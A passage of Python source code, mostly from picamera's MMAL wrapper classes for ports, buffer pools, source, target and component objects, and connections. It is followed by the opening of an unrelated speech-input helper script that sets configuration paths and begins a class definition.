supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
# but what about output ports?
try:
# XXX Return value? If it's an input port we should ignore it,
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
Overridden to to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between Python and and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
|
_v5_proc_adintool.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
# インターフェース
qCtrl_control_speech = 'temp/control_speech.txt'
# qLog,qFunc 共通ルーチン
import _v5__qLog
qLog = _v5__qLog.qLog_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
qPLATFORM = qFunc.getValue('qPLATFORM' )
qRUNATTR = qFunc.getValue('qRUNATTR' )
qHOSTNAME = qFunc.getValue('qHOSTNAME' )
qUSERNAME = qFunc.getValue('qUSERNAME' )
qPath_pictures = qFunc.getValue('qPath_pictures' )
qPath_videos = qFunc.getValue('qPath_videos' )
qPath_cache = qFunc.getValue('qPath_cache' )
qPath_sounds = qFunc.getValue('qPath_sounds' )
qPath_icons = qFunc.getValue('qPath_icons' )
qPath_fonts = qFunc.getValue('qPath_fonts' )
qPath_log = qFunc.getValue('qPath_log' )
qPath_work = qFunc.getValue('qPath_work' )
qPath_rec = qFunc.getValue('qPath_rec' )
qPath_s_ctrl = qFunc.getValue('qPath_s_ctrl' )
qPath_s_inp = qFunc.getValue('qPath_s_inp' )
qPath_s_wav = qFunc.getValue('qPath_s_wav' )
qPath_s_jul = qFunc.getValue('qPath_s_jul' )
qPath_s_STT = qFunc.getValue('qPath_s_STT' )
qPath_s_TTS = qFunc.getValue('qPath_s_TTS' )
qPath_s_TRA = qFunc.getValue('qPath_s_TRA' )
qPath_s_play = qFunc.getValue('qPath_s_play' )
qPath_v_ctrl = qFunc.getValue('qPath_v_ctrl' )
qPath_v_inp = qFunc.getValue('qPath_v_inp' )
qPath_v_jpg = qFunc.getValue('qPath_v_jpg' )
qPath_v_detect = qFunc.getValue('qPath_v_detect' )
qPath_v_cv = qFunc.getValue('qPath_v_cv' )
qPath_v_photo = qFunc.getValue('qPath_v_photo' )
qPath_v_msg = qFunc.getValue('qPath_v_msg' )
qPath_d_ctrl = qFunc.getValue('qPath_d_ctrl' )
qPath_d_play = qFunc.getValue('qPath_d_play' )
qPath_d_prtscn = qFunc.getValue('qPath_d_prtscn' )
qPath_d_movie = qFunc.getValue('qPath_d_movie' )
qPath_d_upload = qFunc.getValue('qPath_d_upload' )
qBusy_dev_cpu = qFunc.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qFunc.getValue('qBusy_dev_com' )
qBusy_dev_mic = qFunc.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qFunc.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qFunc.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qFunc.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qFunc.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qFunc.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qFunc.getValue('qBusy_s_inp' )
qBusy_s_wav = qFunc.getValue('qBusy_s_wav' )
qBusy_s_STT = qFunc.getValue('qBusy_s_STT' )
qBusy_s_TTS = qFunc.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qFunc.getValue('qBusy_s_TRA' )
qBusy_s_play = qFunc.getValue('qBusy_s_play' )
qBusy_v_ctrl = qFunc.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qFunc.getValue('qBusy_v_inp' )
qBusy_v_QR = qFunc.getValue('qBusy_v_QR' )
qBusy_v_jpg = qFunc.getValue('qBusy_v_jpg' )
qBusy_v_CV = qFunc.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qFunc.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qFunc.getValue('qBusy_d_inp' )
qBusy_d_QR = qFunc.getValue('qBusy_d_QR' )
qBusy_d_rec = qFunc.getValue('qBusy_d_rec' )
qBusy_d_play = qFunc.getValue('qBusy_d_play' )
qBusy_d_browser = qFunc.getValue('qBusy_d_browser')
qBusy_d_upload = qFunc.getValue('qBusy_d_upload' )
qRdy__s_force = qFunc.getValue('qRdy__s_force' )
qRdy__s_fproc = qFunc.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qFunc.getValue('qRdy__s_sendkey')
qRdy__v_reader = qFunc.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qFunc.getValue('qRdy__v_sendkey')
qRdy__d_reader = qFunc.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qFunc.getValue('qRdy__d_sendkey')
class proc_adintool:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='sound', micLevel='777', ):
self.path = qPath_s_inp
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
